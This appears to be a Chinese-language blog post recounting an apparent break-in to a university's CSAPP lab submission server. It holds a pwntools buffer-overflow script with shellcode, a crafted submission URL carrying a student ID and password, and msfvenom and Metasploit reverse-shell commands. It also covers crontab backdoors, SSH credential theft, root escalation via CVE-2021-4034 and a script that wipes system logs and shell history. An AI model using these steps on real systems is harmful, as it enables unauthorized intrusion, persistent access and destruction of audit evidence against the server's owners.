<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>大嗨阔(成长度1%)</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);document.addEventListener('pjax:success', _ => bszCaller.fetch(
 "//busuanzi.ibruce.info/busuanzi?jsonpCallback=BusuanziCallback", a => {
  bszTag.texts(a),
  bszTag.shows()
}));reset()})</script><meta name="generator" content="Hexo 7.0.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/links/"><span class="navItemTitle">Links</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">About</span></a></li><li class="navItem"><a class="navBlock" href="/games/"><span class="navItemTitle">Games</span></a></li><li class="navItem"><a class="navBlock" href="/daohang/"><span class="navItemTitle">导航</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1></h1></div><hr><div id="post-content"><h1 id="渗透csapp-lab3"><a href="#渗透csapp-lab3" class="headerlink" title="渗透csapp lab3"></a>渗透csapp lab3</h1><h2 id="源码审计"><a href="#源码审计" class="headerlink" title="源码审计"></a>源码审计</h2><p>ida逆向源码得到提交格式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">http://10.12.13.30:18224/csapp/submitr.pl/?userid=&lt;学号&gt;&amp;password=&lt;密码&gt;&amp;lab=&lt;随便填个数字&gt;&amp;result=1:&lt;cookie&gt;:&lt;我们的输出，用十六进制数加空格表示二进制&gt;&amp;submit=submit<br></code></pre></td></tr></table></figure>

<h2 id="本地测试"><a href="#本地测试" class="headerlink" title="本地测试"></a>本地测试</h2><p>先通过python脚本，调试出可以在本地引起CPU爆满的payload（每个学号对应的缓冲区地址不一样，提前测试好，确认可以rce。在buf里面填入二进制炸弹）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">from pwn import *                           #引入pwn库，方便和bufbomb互动<br>context.log_level=&quot;debug&quot;                   #debug模式，可以看到交互时的输入输出<br>p=process([&quot;./bufbomb_&quot;,&quot;-u&quot;,&quot;2023302646&quot;,&#x27;-p&#x27;,&#x27;666666&#x27;,&#x27;-s&#x27;])#将实验题和需要的参数打包成对象，其中”-s”代表提交<br># attach(p,&#x27;&#x27;&#x27;<br>#        finish<br>#        finish<br>#        finish<br>#        finish<br>#        finish<br>#        &#x27;&#x27;&#x27;)#在下次交互时设置断点<br># pause()#暂停，输入任意键接着运行,<br>buf=asm(&quot;sub esp,0x300&quot;)<br><br>buf += b&quot;\xbf\x14\xe3\x39\x24\xda\xda\xd9\x74\x24\xf4\x58&quot;<br>buf += b&quot;\x33\xc9\xb1\x1f\x31\x78\x15\x83\xe8\xfc\x03\x78&quot;<br>buf += b&quot;\x11\xe2\xe1\x89\x33\x7a\x38\x95\xb3\x61\x69\x6a&quot;<br>buf += b&quot;\x6f\x0c\x8f\xdc\xe9\x59\x6e\xd1\x76\xce\x2b\x82&quot;<br>buf += b&quot;\x59\x92\xa2\x9c\xce\x56\x34\x3e\x45\xde\xd5\x2a&quot;<br>buf += b&quot;\x3f\xb8\x45\xfa\xe8\xb1\x84\xbf\xdb\x42\xc3\x80&quot;<br>buf += b&quot;\x9d\x5b\x85\x74\x63\x34\xbb\x75\x9b\xc4\xe3\x1f&quot;<br>buf += b&quot;\x9b\xae\x16\x69\x78\x1f\xd1\xa4\xff\xe5\x21\x4f&quot;<br>buf += b&quot;\xbd\x0d\x86\x02\xba\x68\xc8\x72\xc5\x8a\x41\x91&quot;<br>buf += b&quot;\x04\x61\x5d\x97\x64\x7a\xed\x6a\xa6\x03\x88\x55&quot;<br>buf += b&quot;\x40\x14\xc9\xdc\x50\x8d\x5f\xb4\x22\xad\x52\xc9&quot;<br>buf += b&quot;\xc6\x72\x14\xc8\x37\x93\x5c\xcd\xc7\x54\x9c\x75&quot;<br>buf += b&quot;\xc6\x54\x9c\x89\x04\xd4&quot;<br><br>payload=24*b&#x27;a&#x27;+b&#x27;b&#x27;*20+p32(0x55683b28)#+buf<br><br>p.sendlineafter(&quot;:&quot;,payload)<br>p.interactive()#将程序的交互权从脚本交给用户<br></code></pre></td></tr></table></figure>

<p>把学号密码和payload代入提交格式（下面的是反弹shell的马，并非二进制炸弹）举个例子罢了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">http://10.12.13.30:18224/csapp/submitr.pl/?userid=2023302753&amp;password=666666&amp;lab=123&amp;result=1:335a79b1:61%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2028%203b%2068%2055%2081%20ec%2000%2003%2000%2000%20ba%2067%2044%20c5%2016%20d9%20ee%20d9%2074%2024%20f4%205e%2031%20c9%20b1%201f%2031%2056%2015%2003%2056%2015%2083%20c6%2004%20e2%2092%202e%20cf%2048%206d%2074%2038%2097%20de%20c9%2094%2032%20e2%207d%207c%204a%2003%20b0%2001%20db%2098%2023%2008%20c4%2003%20a0%2064%2006%203b%20d7%203e%208f%20da%208d%20d8%20d7%204c%2003%2072%2061%208d%20e0%20b1%20f1%20c8%2027%2030%20eb%209c%20d3%20fe%2063%2082%201c%2001%2074%209a%2076%2001%201e%201f%200e%20e2%20ef%20d6%20dd%2065%208a%2028%20a4%20d8%207e%208f%20e5%2024%2038%20cf%2019%202b%203a%2046%20fa%20ea%20d1%2054%203c%200f%2029%20d4%20c3%201d%20b2%2091%20fc%20e6%20a3%20c2%2075%20f7%205d%2046%20ef%2048%205e%206b%2070%202d%20a1%200b%2073%20d1%20c3%2053%2072%202d%2004%20a3%20ce%202c%2004%20a3%2030%20e2%2084%200a&amp;submit=submit<br></code></pre></td></tr></table></figure>

<p>本地测试，访问同构的url，发现服务器崩溃，rce确实存在</p>
<h2 id="正式攻击"><a href="#正式攻击" class="headerlink" title="正式攻击"></a>正式攻击</h2><p>此时将buf换为msf构造的反弹shell的马，重新构造url即可</p>
<p>用msfconsole连接马</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">use exploit/multi/handler<br>set PAYLOAD linux/x86/meterpreter/reverse_tcp<br>set LHOST 10.12.13.30<br>set LPORT 15213<br>exploit<br></code></pre></td></tr></table></figure>

<p>发现马并不持久，总是一闪而过，已知该主机有perl和python写入一个python马</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.32.29.20 LPORT=8010 -b &quot;\x0a&quot; -a x86 --platform linux  -f python &gt; shellcode.txt<br></code></pre></td></tr></table></figure>

<p>再连接python马，实现无限时间的shell</p>
<p>上传一个马，写入定时任务，做一个初步持久化</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">crontab -e 编辑计划任务<br></code></pre></td></tr></table></figure>

<p>使用msf的exp，夺取ssh证书，拿到ssh权限</p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>随后在一个夜深人静的晚上，开始测试提权</p>
<p>发现了一个特好用的辅助提权工具</p>
<h3 id="linux-exploit-suggester"><a href="#linux-exploit-suggester" class="headerlink" title="linux-exploit-suggester"></a>linux-exploit-suggester</h3><h4 id="下载"><a href="#下载" class="headerlink" title="下载"></a>下载</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">git clone https://github.com/The-Z-Labs/linux-exploit-suggester.git<br></code></pre></td></tr></table></figure>

<h4 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#1.评估当前Linux在公开的已知漏洞上的曝光情况:<br>$ ./linux-exploit-suggester.sh<br>#2.显示当前Linux机器上安全功能的状态<br>$ ./linux-exploit-suggester.sh --checksec<br>#3.根据提供的&#x27;uname&#x27;字符串(即uname -a命令的输出)评估Linux内核在公开已知漏洞中的暴露情况<br>$ ./linux-exploit-suggester.sh --uname &lt;uname-string&gt;<br></code></pre></td></tr></table></figure>

<p>发现了一个范围特广的提权漏洞</p>
<h3 id="CVE-2021-4034-polkit（pkexec）提权漏洞"><a href="#CVE-2021-4034-polkit（pkexec）提权漏洞" class="headerlink" title="CVE-2021-4034  polkit（pkexec）提权漏洞"></a>CVE-2021-4034  polkit（pkexec）提权漏洞</h3><p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1945253">https://cloud.tencent.com/developer/article/1945253</a></p>
<p>获得root权限</p>
<h3 id="权限维持"><a href="#权限维持" class="headerlink" title="权限维持"></a>权限维持</h3><p>上传一个马到root文件夹.restart</p>
<p>写入定时任务 <strong>正向shell注意带上timeout</strong>否则会不断开好多，导致无法连接</p>
<p>完成权限维持后</p>
<h3 id="清除痕迹（这个清的不干净，网络连接信息没清掉，后面找个详细的）"><a href="#清除痕迹（这个清的不干净，网络连接信息没清掉，后面找个详细的）" class="headerlink" title="清除痕迹（这个清的不干净，网络连接信息没清掉，后面找个详细的）"></a>清除痕迹（这个清的不干净，网络连接信息没清掉，后面找个详细的）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#!/usr/bin/bash<br>echo &gt; /var/log/syslog<br>echo &gt; /var/log/messages<br>echo &gt; /var/log/httpd/access_log<br>echo &gt; /var/log/httpd/error_log<br>echo &gt; /var/log/xferlog<br>echo &gt; /var/log/secure<br>echo &gt; /var/log/auth.log<br>echo &gt; /var/log/user.log<br>echo &gt; /var/log/wtmp<br>echo &gt; /var/log/lastlog<br>echo &gt; /var/log/btmp<br>echo &gt; /var/run/utmp<br>rm ~/./bash_history<br>history -c<br></code></pre></td></tr></table></figure>

<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2024/03/02/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/IO_2_1_stdin%E7%BB%93%E6%9E%84%E4%BD%93%E5%88%A9%E7%94%A8/">← 下一篇 _IO_2_1_stdin_结构体利用</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/11/19/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/heshi%E4%B8%8Edas%E4%BA%8C%E8%BF%9B%E5%88%B6%E4%B8%93%E9%A1%B9%E7%9A%84%E9%82%82%E9%80%85/">复现das二进制专项 上一篇 →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="文章目录">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="/favicon.ico" alt="Logo"></a><h1 id="Dr"><a href="/">heshi906</a></h1><div id="description"><p>大概只有漫不经心 才是唯一的解药</p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/heshi906"><i class="fab fa-github" alt="GitHub"></i></a></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B8%97%E9%80%8Fcsapp-lab3"><span class="toc-number">1.</span> <span class="toc-text">渗透csapp lab3</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BA%90%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">1.1.</span> <span class="toc-text">源码审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E6%B5%8B%E8%AF%95"><span class="toc-number">1.2.</span> <span class="toc-text">本地测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A3%E5%BC%8F%E6%94%BB%E5%87%BB"><span class="toc-number">1.3.</span> <span class="toc-text">正式攻击</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">1.4.</span> <span class="toc-text">提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#linux-exploit-suggester"><span class="toc-number">1.4.1.</span> <span class="toc-text">linux-exploit-suggester</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%8B%E8%BD%BD"><span class="toc-number">1.4.1.1.</span> <span class="toc-text">下载</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8"><span class="toc-number">1.4.1.2.</span> <span class="toc-text">使用</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#CVE-2021-4034-polkit%EF%BC%88pkexec%EF%BC%89%E6%8F%90%E6%9D%83%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.4.2.</span> <span class="toc-text">CVE-2021-4034  polkit（pkexec）提权漏洞</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81"><span class="toc-number">1.4.3.</span> <span class="toc-text">权限维持</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B8%85%E9%99%A4%E7%97%95%E8%BF%B9%EF%BC%88%E8%BF%99%E4%B8%AA%E6%B8%85%E7%9A%84%E4%B8%8D%E5%B9%B2%E5%87%80%EF%BC%8C%E7%BD%91%E7%BB%9C%E8%BF%9E%E6%8E%A5%E4%BF%A1%E6%81%AF%E6%B2%A1%E6%B8%85%E6%8E%89%EF%BC%8C%E5%90%8E%E9%9D%A2%E6%89%BE%E4%B8%AA%E8%AF%A6%E7%BB%86%E7%9A%84%EF%BC%89"><span class="toc-number">1.4.4.</span> <span class="toc-text">清除痕迹（这个清的不干净，网络连接信息没清掉，后面找个详细的）</span></a></li></ol></li></ol></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> 主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>